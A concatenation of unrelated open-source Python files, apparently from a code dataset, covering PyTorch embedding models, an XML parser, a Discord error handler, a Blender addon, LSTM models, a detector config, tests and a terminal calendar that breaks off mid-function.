]
| 1.554688 | 2 |
models.py | DSRnD/UMLs | 0 | 12797984 | <reponame>DSRnD/UMLs
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
import numpy as np
import torch.autograd as autograd
class NegativeSampling(nn.Module):
"""Negative sampling loss as proposed by <NAME> al. in Distributed
Representations of Words and Phrases and their Compositionality.
"""
def __init__(self):
super(NegativeSampling, self).__init__()
self._log_sigmoid = nn.LogSigmoid()
def forward(self, scores):
"""Computes the value of the loss function.
Parameters
----------
scores: autograd.Variable of size (batch_size, num_noise_words + 1)
Sparse unnormalized log probabilities. The first element in each
row is the ground truth score (i.e. the target), other elements
are scores of samples from the noise distribution.
"""
try:
k = scores.size()[1] - 1
return -torch.sum(
self._log_sigmoid(scores[:, 0])
+ torch.sum(self._log_sigmoid(-scores[:, 1:]), dim=1) / k
) / scores.size()[0]
        except IndexError:
            # scores is 1-D (no separate noise columns): sum over all entries
            return -torch.sum(self._log_sigmoid(scores))
class marginLoss(nn.Module):
def __init__(self):
super(marginLoss, self).__init__()
def forward(self, pos, neg, margin):
val = pos - neg + margin
return torch.sum(torch.max(val, torch.zeros_like(val)))
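
# e.g. marginLoss()(pos=torch.tensor([0.2]), neg=torch.tensor([1.0]), margin=1.0)
# evaluates to 0.2 - 1.0 + 1.0 = 0.2; once neg exceeds pos by the margin,
# the hinge clamps the term to zero.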
def projection_transH(original, norm):
return original - torch.sum(original * norm, dim=1, keepdim=True) * norm
def projection_DistMult(original, norm1, norm2):
return torch.sum(original * norm1, dim=1, keepdim=True) * norm2
def projection_transD(original, norm):
return original + torch.sum(original * norm, dim=1, keepdim=True) * norm
class Link_Model(nn.Module):
    """Link prediction model built on top of a trained D2V_KG model."""
    def __init__(self, kg_model, vec_dim, out_dim):
        super(Link_Model, self).__init__()
        self.vec_dim = vec_dim
        self.out_dim = out_dim
        self.kg_model = kg_model
        # self.linear1 = nn.Linear(self.vec_dim, self.out_dim)
        # note: nn.Linear takes no `requires_grad` kwarg; its parameters
        # are trainable by default
        self.linear = nn.Linear(1, 1, bias=True)
    def forward(self, hi, ti, ri):
        # score the triplet with the frozen KG model (assumes the model was
        # built with d2v_model_ver='none'); ti doubles as the unused noise
        # tail tj, since only the positive score `pos` is needed here
        with torch.no_grad():
            _, _, _, _, pos, _ = self.kg_model(None, None, None, hi, ti, ri, ti)
        out = self.linear(pos.unsqueeze(-1))
        return out
class D2V_KG(nn.Module):
"""Doc2vec model with transh loss
"""
def __init__(self, vec_dim, num_docs, num_words, n_rel, d2v_model_ver, kg_model_ver, margin, delta):
super(D2V_KG, self).__init__()
self.num_docs = num_docs
self.margin = margin
self.delta = delta
self.kg_model_ver = kg_model_ver
self.d2v_model_ver = d2v_model_ver
if d2v_model_ver == 'dm':
self.d2v = DM(vec_dim, num_docs, num_words)
else:
self.d2v = DBOW(vec_dim, num_docs, num_words)
self.cost_func = NegativeSampling()
self.kg_loss_fn = marginLoss()
self.W_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.D_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.M_R = nn.Parameter(
torch.randn(n_rel, vec_dim, vec_dim), requires_grad=True)
normalize_entity_emb = F.normalize(self.d2v._D.data, p=2, dim=1)
normalize_relation_emb = F.normalize(self.W_R.data, p=2, dim=1)
normalize_norm_emb = F.normalize(self.D_R.data, p=2, dim=1)
self.d2v._D.data = normalize_entity_emb
self.W_R.data = normalize_relation_emb
self.D_R.data = normalize_norm_emb
def forward(self, context_ids, doc_ids, target_noise_ids, hi, ti, ri, tj):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
hi: torch.Tensor of size (batch_size,)
Heads from golden triplets from relational graph
ti: torch.Tensor of size (batch_size,)
Tails from golden triplets from relational graph
ri: torch.Tensor of size (batch_size,)
Relations from golden triplets from relational graph
tj: torch.Tensor of size (batch_size,)
Tails from noisy triplets from relational graph
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
hi_emb = self.d2v._D[hi,:]
ti_emb = self.d2v._D[ti,:]
w_ri_emb = self.W_R[ri,:]
d_ri_emb = self.D_R[ri,:]
#tj = random.sample(np.arange(0,self.num_docs).tolist(), hi_emb.shape[0])
#if torch.cuda.is_available():
# tj = torch.LongTensor(np.asarray(tj)).to(torch.device('cuda'))
tj_emb = self.d2v._D[tj,:]
pos = None
neg = None
if self.kg_model_ver == 'transh':
pos_h_e = projection_transH(hi_emb, d_ri_emb)
pos_t_e = projection_transH(ti_emb, d_ri_emb)
neg_h_e = projection_transH(hi_emb, d_ri_emb)
neg_t_e = projection_transH(tj_emb, d_ri_emb)
pos = torch.sum((pos_h_e + w_ri_emb - pos_t_e) ** 2, 1)
neg = torch.sum((neg_h_e + w_ri_emb - neg_t_e) ** 2, 1)
elif self.kg_model_ver == 'transe':
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'distmult':
pos = torch.sum(projection_DistMult(w_ri_emb, hi_emb, ti_emb), 1)
neg = torch.sum(projection_DistMult(w_ri_emb, hi_emb, tj_emb), 1)
elif self.kg_model_ver == 'transr':
M_R = self.M_R[ri,:]
hi_emb = torch.einsum('ij, ijk -> ik', hi_emb, M_R)
ti_emb = torch.einsum('ij, ijk -> ik', ti_emb, M_R)
tj_emb = torch.einsum('ij, ijk -> ik', tj_emb, M_R)
hi_emb = F.normalize(hi_emb, p=2, dim=1)
ti_emb = F.normalize(ti_emb, p=2, dim=1)
tj_emb = F.normalize(tj_emb, p=2, dim=1)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'transd':
hi_emb = projection_transD(hi_emb, w_ri_emb)
ti_emb = projection_transD(ti_emb, w_ri_emb)
tj_emb = projection_transD(tj_emb, w_ri_emb)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
if self.d2v_model_ver != 'none':
d2v_output = self.d2v.forward(context_ids, doc_ids, target_noise_ids)
d2v_loss = self.cost_func.forward(d2v_output)
else:
d2v_output = torch.FloatTensor([0])
d2v_loss = torch.FloatTensor([0])
if self.kg_model_ver != 'none':
#print (pos.shape, neg.shape)
kg_loss = self.kg_loss_fn(pos, neg, self.margin)
else:
kg_loss = torch.FloatTensor([0])
if self.d2v_model_ver != 'none' and self.kg_model_ver != 'none':
total_loss = (1-self.delta)*d2v_loss + self.delta*kg_loss
elif self.d2v_model_ver != 'none':
total_loss = d2v_loss
elif self.kg_model_ver != 'none':
total_loss = kg_loss
else:
raise ValueError("Both D2V and KG model can not be none")
return total_loss, d2v_loss, kg_loss, d2v_output, pos, neg
def get_paragraph_vector(self, index):
return self.d2v._D[index, :].data.tolist()
class DM(nn.Module):
"""Distributed Memory version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
        Number of distinct words in a dataset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DM, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# word matrix
self._W = nn.Parameter(
torch.randn(num_words, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# combine a paragraph vector with word vectors of
# input (context) words
x = torch.add(
self._D[doc_ids, :], torch.sum(self._W[context_ids, :], dim=1))
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
x.unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
class DBOW(nn.Module):
"""Distributed Bag of Words version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
        Number of distinct words in a dataset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DBOW, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
        context_ids: ignored; kept for interface parity with DM.
        doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
self._D[doc_ids, :].unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
| 2.96875 | 3 |
src/screensketch/screenspec/reader/xml.py | perfidia/screensketch | 1 | 12797985 | '''
Created on Apr 12, 2013
@author: <NAME>
'''
from lxml import etree
from screensketch.screenspec import model
class XMLReader(object):
def __init__(self, input_data):
self.input_data = input_data
self.retval = None;
def __parseComponent(self, node, parent):
items = node.items()
if len(items) > 1:
raise ValueError('Incorrect data in component node')
name = None
if len(items) == 1:
name = items[0][1]
clazz = {
'BUTTON': model.Button,
'CHECK_BOX': model.CheckBox,
'CHECK_BOXES': model.CheckBoxes,
'COMBO_BOX': model.ComboBox,
'DYNAMIC_TEXT': model.DynamicText,
'EDIT_BOX': model.EditBox,
'IMAGE': model.Image,
'LINK': model.Link,
'LIST': model.List,
'LIST_BOX': model.ListBox,
'PASSWORD': model.Password,
'RADIO_BUTTON': model.RadioButton,
'RADIO_BUTTONS': model.RadioButtons,
'SIMPLE': model.Simple,
'STATIC_TEXT': model.StaticText,
'TABLE': model.Table,
'TEXT_AREA': model.TextArea,
        }.get(name, model.Entity if name is None else None)
        # default to Entity only when the component carries no name
        # attribute; a named but unrecognised component is an error
        if clazz is None:
            raise ValueError('%s is an unsupported type of component' % name)
        identifier = None
        children = []
values = []
for n in node.getchildren():
if n.tag == 'identifier':
identifier = n.text
elif n.tag == 'children':
children = self.__parseChildren(n, parent)
elif n.tag == 'values':
values = self.__parseValues(n, parent)
else:
raise ValueError('%s is an unsupported node in component tag' % n.tag)
component = clazz(identifier)
for child in children:
component.append(child)
if values:
component._set_static_values(values)
return component
def __parseValues(self, node, parent):
# tag name checked in __parseComponent
children = []
for n in node.getchildren():
if n.tag == 'value':
selected = False
items = n.items()
if len(items) == 1 and len(items[0]) == 2:
selected = items[0][1]
children.append(model.StaticValue(n.text, selected))
else:
raise ValueError('%s is an unsupported node in values tag' % n.tag)
return children
def __parseChildren(self, node, parent):
# tag name checked in __parseScreen
children = []
for n in node.getchildren():
children.append(self.__parseComponent(n, parent))
return children
def __parseScreen(self, node, parent):
if node.tag != 'screen':
raise ValueError('Tag screen-spec not found')
        name = None
        children = []
for n in node.getchildren():
if n.tag == 'name':
name = n.text
elif n.tag == 'children':
children = self.__parseChildren(n, parent)
else:
raise ValueError('Unknown node in screen tag found')
parent.append(model.Screen(name, children))
def __parseScreenSpec(self, node):
if node.tag != 'screen-spec':
raise ValueError('Tag screen-spec not found')
self.retval = model.ScreenSpec()
for n in node.getchildren():
self.__parseScreen(n, self.retval)
def execute(self):
root = etree.fromstring(self.input_data)
self.__parseScreenSpec(root)
return self.retval
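
# --- Usage sketch (illustrative; assumes the screensketch model API) -----
if __name__ == '__main__':
    SPEC = b"""
    <screen-spec>
      <screen>
        <name>Login</name>
        <children>
          <component name="BUTTON"><identifier>ok</identifier></component>
        </children>
      </screen>
    </screen-spec>"""
    print(XMLReader(SPEC).execute())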
| 2.421875 | 2 |
Leetcode/0652. Find Duplicate Subtrees/0652.py | Next-Gen-UI/Code-Dynamics | 0 | 12797986 | <reponame>Next-Gen-UI/Code-Dynamics
from collections import Counter
from typing import List, Optional


# Definition for a binary tree node (normally provided by the LeetCode
# runtime; included here so the snippet runs standalone).
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


class Solution:
def findDuplicateSubtrees(self, root: Optional[TreeNode]) -> List[Optional[TreeNode]]:
ans = []
count = Counter()
def encode(root: Optional[TreeNode]) -> str:
if not root:
return ''
left = encode(root.left)
right = encode(root.right)
encoding = str(root.val) + '#' + left + '#' + right
if count[encoding] == 1:
ans.append(root)
count[encoding] += 1
return encoding
encode(root)
return ans
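
# Quick check (uses the TreeNode stub above, which is an addition): the tree
# 1 -> (2 -> 4, 3 -> (2 -> 4, 4)) has duplicate subtrees [4] and [2, 4].
if __name__ == '__main__':
    root = TreeNode(1,
                    TreeNode(2, TreeNode(4)),
                    TreeNode(3, TreeNode(2, TreeNode(4)), TreeNode(4)))
    dups = Solution().findDuplicateSubtrees(root)
    print(sorted(d.val for d in dups))  # -> [2, 4]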
| 2.9375 | 3 |
events/on_error.py | DangVietH/DangVietBot | 2 | 12797987 | from discord.ext import commands
import discord
import datetime
class OnError(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
ignore = (commands.CommandNotFound, discord.NotFound, discord.Forbidden)
if isinstance(error, ignore):
return
embed = discord.Embed(color=self.bot.embed_color)
if isinstance(error, commands.BotMissingPermissions):
perms = ", ".join([f"{x.replace('_', ' ').replace('guild', 'server').title()}" for x in error.missing_permissions])
embed.title = "Bot Missing Permissions"
embed.description = f"I am missing the following permissions: {perms}!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MissingPermissions):
perms = ", ".join([f"{x.replace('_', ' ').replace('guild', 'server').title()}" for x in error.missing_permissions])
embed.title = "Missing Permissions"
embed.description = f"You are missing the following permissions: {perms}!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.NotOwner):
embed.title = "Not Owner"
embed.description = f"You're not the owner of this bot!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MissingRequiredArgument):
embed.title = "Missing Argument"
embed.description = f"You are missing a required argument for this command to work: `{error.param.name}`!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.CommandOnCooldown):
seconds = int(error.retry_after)
wait_until_finish = datetime.datetime.now() + datetime.timedelta(seconds=seconds)
await ctx.send(f'⏱️ This command is on a cooldown. Use it after <t:{int(datetime.datetime.timestamp(wait_until_finish))}:R>')
return
if isinstance(error, commands.DisabledCommand):
embed.title = "Disabled"
embed.description = "This command is disabled by the bot's owner!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.BadArgument):
if isinstance(error, commands.MessageNotFound):
embed.title = "Message Not Found"
embed.description = "The message id/link you provided is invalid or deleted!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MemberNotFound):
embed.title = "Member Not Found"
embed.description = "The member id/mention/name you provided is invalid or didn't exist in this server!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.UserNotFound):
embed.title = "User Not Found"
embed.description = "The user id/mention/name you provided is invalid or I cannot see that User!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.ChannelNotFound):
embed.title = "Channel Not Found"
embed.description = "The channel id/mention/name you provided is invalid or I access it!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.RoleNotFound):
embed.title = "Role Not Found"
embed.description = "The role id/mention/name you provided is invalid or I cannot see that role!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.EmojiNotFound):
embed.title = "Emoji Not Found"
embed.description = "The emoji id/name you provided is invalid or I cannot see that emoji!"
await ctx.send(embed=embed)
return
embed.title = "Unexpected Error"
embed.description = error
await ctx.send(embed=embed)
async def setup(bot):
await bot.add_cog(OnError(bot)) | 2.640625 | 3 |
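
# Loading sketch (assumes the standard discord.py 2.x extension mechanism):
#   await bot.load_extension("events.on_error")
# discord.py then awaits setup() above, which registers this cog.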
scripts/addons/context_browser/preferences.py | Tilapiatsu/blender-custom_conf | 2 | 12797988 | <reponame>Tilapiatsu/blender-custom_conf<filename>scripts/addons/context_browser/preferences.py
import bpy
from .addon import ADDON_ID, temp_prefs, prefs, ic
from .utils.collection_utils import sort_collection
from .ops.context_browser import CB_OT_browser
class BookmarkItem(bpy.types.PropertyGroup):
path = bpy.props.StringProperty()
class CB_Preferences(bpy.types.AddonPreferences):
bl_idname = ADDON_ID
bookmarks = bpy.props.CollectionProperty(type=BookmarkItem)
def update_lists(self, context):
tpr = temp_prefs()
tpr.cd.update_lists(tpr.path, False)
show_bool_props = bpy.props.BoolProperty(
name="Show Bool Properties", description="Show bool properties",
default=True, update=update_lists)
show_int_props = bpy.props.BoolProperty(
name="Show Int Properties", description="Show int properties",
default=True, update=update_lists)
show_float_props = bpy.props.BoolProperty(
name="Show Float Properties", description="Show float properties",
default=True, update=update_lists)
show_str_props = bpy.props.BoolProperty(
name="Show String Properties", description="Show string properties",
default=True, update=update_lists)
show_enum_props = bpy.props.BoolProperty(
name="Show Enum Properties", description="Show enum properties",
default=True, update=update_lists)
show_vector_props = bpy.props.BoolProperty(
name="Show Vector Properties", description="Show vector properties",
default=True, update=update_lists)
group_none = bpy.props.BoolProperty(
name="Group None Objects",
description="Group None objects",
default=False, update=update_lists)
show_prop_ids = bpy.props.BoolProperty(
name="Show Property Identifiers",
description="Show property identifiers",
default=True)
def show_header_btn_update(self, context):
prefs().register_header_btn(self.show_header_btn)
show_header_btn = bpy.props.BoolProperty(
name="Show Header Button",
description="Show header button",
update=show_header_btn_update,
default=True)
obj_list_width = bpy.props.IntProperty(
name="Width", description="Width of the list",
subtype='PERCENTAGE',
default=40, min=20, max=80)
list_height = bpy.props.IntProperty(
name="Number of Rows", description="Number of rows in lists",
default=10, min=5, max=100)
popup_width = bpy.props.IntProperty(
name="Width", description="Popup width",
subtype='PIXEL',
default=640, min=300, max=3000)
def draw(self, context):
layout = self.layout
row = layout.row()
row.scale_y = 1.5
row.operator(CB_OT_browser.bl_idname)
row = layout.split()
col = row.column(align=True)
col.label(text="Popup:")
col.prop(self, "popup_width")
col.prop(self, "list_height")
col = row.column(align=True)
col.label(text="Header:")
col.prop(self, "show_header_btn")
def add_bookmark(self, bookmark, name=None):
if bookmark in self.bookmarks:
return
item = self.bookmarks.add()
item.name = name or bookmark
item.path = bookmark
sort_collection(self.bookmarks, key=lambda item: item.name)
def remove_bookmark(self, bookmark):
for i, b in enumerate(self.bookmarks):
if b.path == bookmark:
self.bookmarks.remove(i)
break
def rename_bookmark(self, bookmark, name):
for b in self.bookmarks:
if b.path == bookmark:
b.name = name
break
sort_collection(self.bookmarks, key=lambda item: item.name)
def register_header_btn(self, value):
for tp_name in (
'CLIP_HT_header', 'CONSOLE_HT_header',
'DOPESHEET_HT_header', 'FILEBROWSER_HT_header',
'GRAPH_HT_header', 'IMAGE_HT_header',
'INFO_HT_header', 'LOGIC_HT_header',
'NLA_HT_header', 'NODE_HT_header',
'OUTLINER_HT_header', 'PROPERTIES_HT_header',
'SEQUENCER_HT_header', 'TEXT_HT_header',
'TIME_HT_header', 'USERPREF_HT_header',
'VIEW3D_HT_header'):
tp = getattr(bpy.types, tp_name, None)
if not tp:
continue
if value:
tp.prepend(self.header_menu)
else:
tp.remove(self.header_menu)
@staticmethod
def context_menu(menu, context):
layout = menu.layout
layout.operator("cb.browser", icon=ic('BLENDER'))
@staticmethod
def header_menu(menu, context):
layout = menu.layout
layout.operator("cb.browser", text="", icon=ic('BLENDER'), emboss=False)
def register():
pr = prefs()
if pr.show_header_btn:
pr.register_header_btn(True)
def unregister():
pr = prefs()
if pr.show_header_btn:
pr.register_header_btn(False)
| 1.953125 | 2 |
net/lstm.py | workofart/brawlstars-ai | 12 | 12797989 | <filename>net/lstm.py<gh_stars>10-100
import numpy as np
import tensorflow as tf
import tflearn
import os
def get_movement_model(steps):
# Network building
net = tflearn.input_data(shape=[None, steps, 128], name='net1_layer1')
net = tflearn.lstm(net, n_units=256, return_seq=True, name='net1_layer2')
net = tflearn.dropout(net, 0.8, name='net1_layer3')
net = tflearn.lstm(net, n_units=256, return_seq=False, name='net1_layer4')
net = tflearn.dropout(net, 0.8, name='net1_layer5')
net = tflearn.fully_connected(net, 5, activation='softmax', name='net1_layer6')
net = tflearn.regression(net, optimizer='rmsprop', loss='categorical_crossentropy', learning_rate=0.0001,
name='net1_layer7')
return tflearn.DNN(net, clip_gradients=5.0, tensorboard_dir='logs', tensorboard_verbose=0)
def get_action_model(steps):
# Network building
net = tflearn.input_data(shape=[None, steps, 128], name='net2_layer1')
net = tflearn.lstm(net, n_units=256, return_seq=True, name='net2_layer2')
net = tflearn.dropout(net, 0.8, name='net2_layer3')
net = tflearn.lstm(net, n_units=256, return_seq=False, name='net2_layer4')
net = tflearn.dropout(net, 0.8, name='net2_layer5')
net = tflearn.fully_connected(net, 3, activation='softmax', name='net2_layer6')
net = tflearn.regression(net, optimizer='rmsprop', loss='categorical_crossentropy', learning_rate=1e-5,
name='net2_layer7')
return tflearn.DNN(net, clip_gradients=5.0, tensorboard_dir='logs', tensorboard_verbose=0)
def reshape_for_lstm(data, steps_of_history=10):
trainX = []
trainY_movement = []
trainY_action = []
for i in range(0, len(data) - steps_of_history):
window = data[i:i + steps_of_history]
sampleX = []
for row in window:
sampleX.append(row[0])
sampleY_movement = np.array(window[-1][1]).reshape(-1)
sampleY_action = np.array(window[-1][2]).reshape(-1)
trainX.append(np.array(sampleX).reshape(steps_of_history, -1))
trainY_movement.append(sampleY_movement)
trainY_action.append(sampleY_action)
print(np.array(trainX).shape)
print(np.array(trainY_movement).shape)
print(np.array(trainY_action).shape)
return trainX, list(trainY_movement), list(trainY_action)
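
# Training sketch (illustrative; assumes each row of `data` looks like
# [frame_vector(128), movement_onehot(5), action_onehot(3)]):
#   steps = 10
#   X, y_move, _ = reshape_for_lstm(data, steps_of_history=steps)
#   model = get_movement_model(steps)
#   model.fit(X, y_move, n_epoch=10, validation_set=0.1, show_metric=True)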
| 2.671875 | 3 |
basics/deque_example.py | examplehub/Python | 9 | 12797990 | def main() -> None:
"""
>>> from collections import deque
>>> queue = deque(["Python", "Java", "C"])
>>> len(queue)
3
>>> queue
deque(['Python', 'Java', 'C'])
>>> queue.popleft()
'Python'
>>> queue.popleft()
'Java'
>>> queue.clear()
>>> len(queue)
0
>>> queue
deque([])
>>> queue.popleft()
Traceback (most recent call last):
...
IndexError: pop from an empty deque
"""
if __name__ == "__main__":
from doctest import testmod
testmod()
| 3.078125 | 3 |
downstream/tinypersons/configs2/TinyPerson/base/retinanet_r50_fpns4_1x_TinyPerson640_clipg.py | bwconrad/solo-learn | 37 | 12797991 | <gh_stars>10-100
_base_ = [
'./retinanet_r50_fpn_1x_TinyPerson640.py'
]
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001) # 4 gpu
optimizer_config = dict(_delete_=True, grad_clip=dict(max_norm=1, norm_type=2)) # add grad clip
# model settings
model = dict(
neck=dict(
start_level=0, # start_level=1,
# add_extra_convs='on_input', # note
num_outs=5),
bbox_head=dict(
type='RetinaHead',
num_classes=1, # 80
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=2, # 4
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64] # [8, 16, 32, 64, 128]
)
)
)
| 1.492188 | 1 |
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
return {
"hidden_size1": 6,
"hidden_size2": 4,
"combined_hidden_size": 16,
"num_attention_heads": 2,
"dropout1": 0.1,
"dropout2": 0.2,
}
@pytest.fixture
def params(params_dict):
return Params(params_dict)
@pytest.fixture
def biattention(params):
return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
assert biattention.num_attention_heads == params_dict["num_attention_heads"]
assert biattention.attention_head_size == int(
params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
)
assert (
biattention.all_head_size
== params_dict["num_attention_heads"] * biattention.attention_head_size
)
assert biattention.query1.in_features == params_dict["hidden_size1"]
assert biattention.key1.in_features == params_dict["hidden_size1"]
assert biattention.value1.in_features == params_dict["hidden_size1"]
assert biattention.dropout1.p == params_dict["dropout1"]
assert biattention.query2.in_features == params_dict["hidden_size2"]
assert biattention.key2.in_features == params_dict["hidden_size2"]
assert biattention.value2.in_features == params_dict["hidden_size2"]
assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
biattention(
torch.randn(2, 3, 6),
torch.randn(2, 3, 4),
torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors
torch.randint(0, 2, (2, 2, 3, 3)) == 1,
)
| 2.25 | 2 |
People/Juan/Week 2/Calendar.py | rmorgan10/ExpertPythonProgramming | 2 | 12797993 | #!/usr/bin/env python3
from typing import List, Dict
from datetime import date, datetime, timedelta
from calendar import monthrange
import os
from typing import TypeVar, Tuple
from benedict import benedict
from Events import Event
from CalendarErrors import BreakoutError, MainError
from Prompt import prompt_user_date, parse_user_date, prompt_user_time
"""
Should print a calendar to the terminal/console output and prompt the user to
input some number of possible commands to:
* scroll from month to month
* make, read, and modify events on certain days
"""
DateTypes = TypeVar("DateTypes", date, datetime)
class Calendar:
"""
Calendar class to hold info on all events in our calendar
"""
WEEKDAYS = ["Mo", "Tu", "We", "Th", "Fr", "Sa", "Su"]
# calendar commands ============================================================================
# scroll ---------------------------------------------------------------------------------------
SCROLL = "S"
FORWARD = "F"
BACKWARD = "B"
SCROLLING = [SCROLL, FORWARD, BACKWARD]
# Event ----------------------------------------------------------------------------------------
NEW = "N"
MODIFY = "C"
READ = "R"
EVENTS = [NEW, MODIFY, READ]
VERB = {
NEW: "Made",
MODIFY: "Modified",
READ: "Read"
}
# utility --------------------------------------------------------------------------------------
QUIT = "Q"
HELP = "H"
ALL = "A"
UTIL = [QUIT, HELP, ALL]
COMMANDS = SCROLLING + EVENTS + UTIL
# indicators -----------------------------------------------------------------------------------
DAY = "D"
MONTH = "M"
YEAR = "Y"
EVENT = "E"
INDICATORS = [DAY, MONTH, YEAR, EVENT]
MONTHS = {
1: "January",
2: "February",
3: "March",
4: "April",
5: "May",
6: "June",
7: "July",
8: "August",
9: "September",
10: "October",
11: "November",
12: "December"
}
MENU_STRING = f"""
Here's how to use the calendar!
To scroll to the next day enter : {FORWARD}{DAY}
TO scroll to the previous day enter : {BACKWARD}{DAY}
To scroll to the the next month enter : {FORWARD}{MONTH}
To scroll to the previous month enter : {BACKWARD}{MONTH}
To scroll to the next year enter : {FORWARD}{YEAR}
To scroll to the previous year enter : {BACKWARD}{YEAR}
To scroll to a date enter : {SCROLL} <date in yyyy/mm/dd format>
To create an event enter : {NEW} <date in yyyy/mm/dd format> - <name>
To modify an event enter : {MODIFY} <date in yyyy/mm/dd format> - <name>
To read an event enter : {READ} <date in yyyy/mm/dd format> - <name>
To print all events enter : {ALL}
    (To continue, press enter)
"""
def __init__(self):
"""
Constructor for the Calendar
Stores events as a nested dictionary with dates as keys, lastly with a names dict.
Structure:
self.events = {
year(str) : {
month(str) : {
day(str) : {
name(str) : (Event)
}
}
}
}
"""
self.events = benedict()
self.today = date.today()
def command_loop(self):
"""
Main loop of the calendar. Prompts the user to input commands to modify the calendar or
scroll around in time
"""
command_ms = "Welcome to the calendar, what would you like to do? \n"
command_ms += "(Q to quit, H for help) : "
ignores = [" ", "\n"]
while True:
self.print_calendar()
user_input = input(command_ms)
for ignore in ignores:
user_input = user_input.replace(ignore, "")
try:
cmd = user_input[0].upper()
except IndexError:
continue
try:
if cmd == self.QUIT:
break
elif cmd == self.HELP:
input(self.MENU_STRING)
elif cmd == self.ALL:
self.print_all_events()
elif cmd in self.SCROLLING:
self.scroll(user_input)
elif cmd in self.EVENTS:
self.eventing(user_input)
else:
input(f"{cmd} is not a valid command, please input a valid command\
{self.MENU_STRING}")
# MainError is just an indicator that user wants to try and input again
except MainError:
continue
def scroll(self, usr_input: str):
"""
parse scroll commands from the user and make the correct call to print_calendar()
Args:
usr_input : string input by the user. Should be led by a valid scroll based command
"""
cmd = usr_input[0]
if len(usr_input) > 1:
usr_args = usr_input[1:]
else:
usr_args = None
if cmd == self.SCROLL:
calendar_date = parse_user_date(usr_args)
self.today = calendar_date
elif cmd == self.FORWARD or cmd == self.BACKWARD:
# Move forward of backward
if cmd == self.FORWARD:
sgn = 1
else:
sgn = -1
if usr_args is not None:
usr_ind = usr_args[0].upper()
else:
usr_ind = usr_args
